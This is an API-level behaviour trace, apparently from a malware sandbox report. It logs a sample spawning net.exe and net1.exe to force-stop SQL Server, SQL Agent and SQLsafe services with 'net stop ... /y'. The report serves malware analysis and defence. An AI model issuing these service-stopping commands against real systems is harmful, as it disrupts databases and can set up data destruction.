0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x13 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x14 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x14 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x15 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.703] LocalFree (hMem=0x359638) returned 0x0 [0218.703] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x15 [0218.703] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x359638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="阸5⡋瓢\x1d阸5\x1d") returned 0x16 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x359638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="䵀5⡋瓢\x1d阸5\x1d") returned 0x11 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x354d40) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d䵀5\x1d") returned 0x14 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x35b638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d똸5\x1d") returned 0x12 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x35b638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d똸5\x1d") returned 0xf [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x35b638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d똸5\x1d") returned 0x17 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x35b638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d똸5\x1d") returned 0x18 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x35b638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d똸5\x1d") returned 0x2a [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0218.704] LocalFree (hMem=0x35b638) returned 0x0 [0218.704] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a80000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1df4f0, nSize=0x0, Arguments=0x1df4ec | out: lpBuffer="똸5⡋瓢\x1d똸5\x1d") returned 0x15 [0218.704] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0218.704] GetFileType (hFile=0x26c) returned 0x3 [0218.704] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x1df508 | out: lpMode=0x1df508) returned 0 [0218.705] GetConsoleOutputCP () returned 0x1b5 [0218.705] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0218.705] malloc (_Size=0x16) returned 0x142730 [0218.705] GetConsoleOutputCP () returned 0x1b5 [0218.705] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x142730, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0218.705] WriteFile (in: hFile=0x26c, lpBuffer=0x142730, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x1df50c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1df50c, lpOverlapped=0x0) returned 0 [0218.705] free (_Block=0x142730) [0218.705] LocalFree (hMem=0x35b638) returned 0x0 [0218.706] NetApiBufferFree (Buffer=0x351c98) returned 0x0 [0218.706] NetApiBufferFree (Buffer=0x351cb0) returned 0x0 [0218.706] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y" [0218.706] exit (_Code=1) Process: id = "382" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5f47f000" os_pid = "0x950" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 557 os_tid = 0x930 Process: id = "383" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x54e9b000" os_pid = "0x330" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "382" os_parent_pid = "0x950" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 558 os_tid = 0x8f0 [0218.852] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f7e0 | out: lpSystemTimeAsFileTime=0x16f7e0*(dwLowDateTime=0x4ba202a0, dwHighDateTime=0x1d57a87)) [0218.852] GetCurrentProcessId () returned 0x330 [0218.852] GetCurrentThreadId () returned 0x8f0 [0218.852] GetTickCount () returned 0x11703f7 [0218.852] QueryPerformanceCounter (in: lpPerformanceCount=0x16f7d8 | out: lpPerformanceCount=0x16f7d8*=33913690784) returned 1 [0218.853] GetModuleHandleA (lpModuleName=0x0) returned 0x320000 [0218.853] __set_app_type (_Type=0x1) [0218.853] __p__fmode () returned 0x74eb31f4 [0218.853] __p__commode () returned 0x74eb31fc [0218.853] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x32ffe6) returned 0x0 [0218.853] __getmainargs (in: _Argc=0x339064, _Argv=0x33906c, _Env=0x339068, _DoWildCard=0, _StartInfo=0x339024 | out: _Argc=0x339064, _Argv=0x33906c, _Env=0x339068) returned 0 [0218.853] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.853] GetConsoleOutputCP () returned 0x1b5 [0218.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x339080 | out: lpCPInfo=0x339080) returned 1 [0218.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.856] sprintf_s (in: _DstBuf=0x16f798, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.857] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.859] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0218.859] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0218.859] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROD /y" [0218.859] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f564, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.859] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x68) returned 0x383c10 [0218.859] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.859] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f768 | out: Buffer=0x16f768*=0x381c70) returned 0x0 [0218.859] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f768 | out: Buffer=0x16f768*=0x381c88) returned 0x0 [0218.859] _fileno (_File=0x74eb2900) returned -2 [0218.860] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0218.860] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.860] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.860] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.860] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.860] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.860] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.860] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.860] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.860] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.860] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.860] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.860] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.860] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.860] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.860] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.860] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0218.860] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.860] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.860] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.860] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.860] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.860] _wcsicmp (_String1="accounts", _String2="MSSQL$PROD") returned -12 [0218.860] _wcsicmp (_String1="computer", _String2="MSSQL$PROD") returned -10 [0218.860] _wcsicmp (_String1="config", _String2="MSSQL$PROD") returned -10 [0218.860] _wcsicmp (_String1="continue", _String2="MSSQL$PROD") returned -10 [0218.860] _wcsicmp (_String1="cont", _String2="MSSQL$PROD") returned -10 [0218.860] _wcsicmp (_String1="file", _String2="MSSQL$PROD") returned -7 [0218.860] _wcsicmp (_String1="files", _String2="MSSQL$PROD") returned -7 [0218.860] _wcsicmp (_String1="group", _String2="MSSQL$PROD") returned -6 [0218.860] _wcsicmp (_String1="groups", _String2="MSSQL$PROD") returned -6 [0218.860] _wcsicmp (_String1="help", _String2="MSSQL$PROD") returned -5 [0218.860] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PROD") returned -5 [0218.860] _wcsicmp (_String1="localgroup", _String2="MSSQL$PROD") returned -1 [0218.860] _wcsicmp (_String1="pause", _String2="MSSQL$PROD") returned 3 [0218.861] _wcsicmp (_String1="session", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="sessions", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="sess", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="share", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="start", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="stats", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="statistics", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="stop", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="time", _String2="MSSQL$PROD") returned 7 [0218.861] _wcsicmp (_String1="user", _String2="MSSQL$PROD") returned 8 [0218.861] _wcsicmp (_String1="users", _String2="MSSQL$PROD") returned 8 [0218.861] _wcsicmp (_String1="msg", _String2="MSSQL$PROD") returned -12 [0218.861] _wcsicmp (_String1="messenger", _String2="MSSQL$PROD") returned -14 [0218.861] _wcsicmp (_String1="receiver", _String2="MSSQL$PROD") returned 5 [0218.861] _wcsicmp (_String1="rcv", _String2="MSSQL$PROD") returned 5 [0218.861] _wcsicmp (_String1="netpopup", _String2="MSSQL$PROD") returned 1 [0218.861] _wcsicmp (_String1="redirector", _String2="MSSQL$PROD") returned 5 [0218.861] _wcsicmp (_String1="redir", _String2="MSSQL$PROD") returned 5 [0218.861] _wcsicmp (_String1="rdr", _String2="MSSQL$PROD") returned 5 [0218.861] _wcsicmp (_String1="workstation", _String2="MSSQL$PROD") returned 10 [0218.861] _wcsicmp (_String1="work", _String2="MSSQL$PROD") returned 10 [0218.861] _wcsicmp (_String1="wksta", _String2="MSSQL$PROD") returned 10 [0218.861] _wcsicmp (_String1="prdr", _String2="MSSQL$PROD") returned 3 [0218.861] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROD") returned -9 [0218.861] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROD") returned -1 [0218.861] _wcsicmp (_String1="server", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="svr", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="srv", _String2="MSSQL$PROD") returned 6 [0218.861] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROD") returned -1 [0218.861] _wcsicmp (_String1="alerter", _String2="MSSQL$PROD") returned -12 [0218.861] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROD") returned 1 [0218.861] _wcsupr (in: _String="MSSQL$PROD" | out: _String="MSSQL$PROD") returned="MSSQL$PROD" [0218.862] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3854c8 [0218.867] GetServiceKeyNameW (in: hSCManager=0x3854c8, lpDisplayName="MSSQL$PROD", lpServiceName=0x33aaf0, lpcchBuffer=0x16f704 | out: lpServiceName="", lpcchBuffer=0x16f704) returned 0 [0218.867] _wcsicmp (_String1="msg", _String2="MSSQL$PROD") returned -12 [0218.867] _wcsicmp (_String1="messenger", _String2="MSSQL$PROD") returned -14 [0218.867] _wcsicmp (_String1="receiver", _String2="MSSQL$PROD") returned 5 [0218.867] _wcsicmp (_String1="rcv", _String2="MSSQL$PROD") returned 5 [0218.867] _wcsicmp (_String1="redirector", _String2="MSSQL$PROD") returned 5 [0218.867] _wcsicmp (_String1="redir", _String2="MSSQL$PROD") returned 5 [0218.867] _wcsicmp (_String1="rdr", _String2="MSSQL$PROD") returned 5 [0218.867] _wcsicmp (_String1="workstation", _String2="MSSQL$PROD") returned 10 [0218.867] _wcsicmp (_String1="work", _String2="MSSQL$PROD") returned 10 [0218.867] _wcsicmp (_String1="wksta", _String2="MSSQL$PROD") returned 10 [0218.867] _wcsicmp (_String1="prdr", _String2="MSSQL$PROD") returned 3 [0218.867] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROD") returned -9 [0218.867] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROD") returned -1 [0218.867] _wcsicmp (_String1="server", _String2="MSSQL$PROD") returned 6 [0218.867] _wcsicmp (_String1="svr", _String2="MSSQL$PROD") returned 6 [0218.868] _wcsicmp (_String1="srv", _String2="MSSQL$PROD") returned 6 [0218.868] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROD") returned -1 [0218.868] _wcsicmp (_String1="alerter", _String2="MSSQL$PROD") returned -12 [0218.868] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROD") returned 1 [0218.868] NetServiceControl (in: servername=0x0, service="MSSQL$PROD", opcode=0x0, arg=0x0, bufptr=0x16f700 | out: bufptr=0x16f700) returned 0x889 [0218.868] wcscpy_s (in: _Destination=0x33a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.869] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0218.869] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x33b338, nSize=0x800, Arguments=0x339dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0218.921] GetFileType (hFile=0x26c) returned 0x3 [0218.921] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x383ff8 [0218.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x383ff8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0218.924] WriteFile (in: hFile=0x26c, lpBuffer=0x383ff8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f640, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f640, lpOverlapped=0x0) returned 0 [0218.924] LocalFree (hMem=0x383ff8) returned 0x0 [0218.925] GetFileType (hFile=0x26c) returned 0x3 [0218.925] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3862a0 [0218.925] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3862a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n8", lpUsedDefaultChar=0x0) returned 2 [0218.926] WriteFile (in: hFile=0x26c, lpBuffer=0x3862a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f640, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f640, lpOverlapped=0x0) returned 0 [0218.928] LocalFree (hMem=0x3862a0) returned 0x0 [0218.929] _ultow (in: _Dest=0x889, _Radix=1504880 | out: _Dest=0x889) returned="2185" [0218.930] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x33b338, nSize=0x800, Arguments=0x339dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0218.948] GetFileType (hFile=0x26c) returned 0x3 [0218.948] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3862a0 [0218.948] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3862a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0218.948] WriteFile (in: hFile=0x26c, lpBuffer=0x3862a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f64c, lpOverlapped=0x0) returned 0 [0218.948] LocalFree (hMem=0x3862a0) returned 0x0 [0218.948] GetFileType (hFile=0x26c) returned 0x3 [0218.948] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3862a0 [0218.948] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3862a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n8", lpUsedDefaultChar=0x0) returned 2 [0218.948] WriteFile (in: hFile=0x26c, lpBuffer=0x3862a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f64c, lpOverlapped=0x0) returned 0 [0218.948] LocalFree (hMem=0x3862a0) returned 0x0 [0218.949] NetApiBufferFree (Buffer=0x381c70) returned 0x0 [0218.949] NetApiBufferFree (Buffer=0x381c88) returned 0x0 [0218.949] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROD /y" [0218.949] exit (_Code=2) Process: id = "384" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5e184000" os_pid = "0xa0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 559 os_tid = 0x8a8 Process: id = "385" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x551f9000" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "384" os_parent_pid = "0xa0c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PROD /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 560 os_tid = 0x968 [0219.201] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf878 | out: lpSystemTimeAsFileTime=0x1cf878*(dwLowDateTime=0x4bd8c240, dwHighDateTime=0x1d57a87)) [0219.201] GetCurrentProcessId () returned 0x8ac [0219.201] GetCurrentThreadId () returned 0x968 [0219.201] GetTickCount () returned 0x117055e [0219.201] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf870 | out: lpPerformanceCount=0x1cf870*=33948537362) returned 1 [0219.201] GetModuleHandleA (lpModuleName=0x0) returned 0x740000 [0219.201] __set_app_type (_Type=0x1) [0219.201] __p__fmode () returned 0x74eb31f4 [0219.201] __p__commode () returned 0x74eb31fc [0219.201] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x74ffe6) returned 0x0 [0219.201] __getmainargs (in: _Argc=0x759064, _Argv=0x75906c, _Env=0x759068, _DoWildCard=0, _StartInfo=0x759024 | out: _Argc=0x759064, _Argv=0x75906c, _Env=0x759068) returned 0 [0219.201] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.202] GetConsoleOutputCP () returned 0x1b5 [0219.202] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x759080 | out: lpCPInfo=0x759080) returned 1 [0219.202] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.205] sprintf_s (in: _DstBuf=0x1cf830, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0219.205] setlocale (category=0, locale=".437") returned="English_United States.437" [0219.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0219.207] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0219.207] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PROD /y" [0219.207] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf5fc, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0219.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2c3c10 [0219.207] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0219.208] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf800 | out: Buffer=0x1cf800*=0x2c1c70) returned 0x0 [0219.208] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf800 | out: Buffer=0x1cf800*=0x2c1c88) returned 0x0 [0219.208] _fileno (_File=0x74eb2900) returned -2 [0219.208] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0219.208] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0219.208] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0219.208] _wcsicmp (_String1="config", _String2="stop") returned -16 [0219.208] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0219.208] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0219.208] _wcsicmp (_String1="file", _String2="stop") returned -13 [0219.208] _wcsicmp (_String1="files", _String2="stop") returned -13 [0219.208] _wcsicmp (_String1="group", _String2="stop") returned -12 [0219.208] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0219.208] _wcsicmp (_String1="help", _String2="stop") returned -11 [0219.208] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0219.208] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0219.208] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0219.208] _wcsicmp (_String1="session", _String2="stop") returned -15 [0219.208] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0219.208] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0219.208] _wcsicmp (_String1="share", _String2="stop") returned -12 [0219.208] _wcsicmp (_String1="start", _String2="stop") returned -14 [0219.208] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0219.208] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0219.208] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0219.208] _wcsicmp (_String1="accounts", _String2="SQLAgent$PROD") returned -18 [0219.208] _wcsicmp (_String1="computer", _String2="SQLAgent$PROD") returned -16 [0219.208] 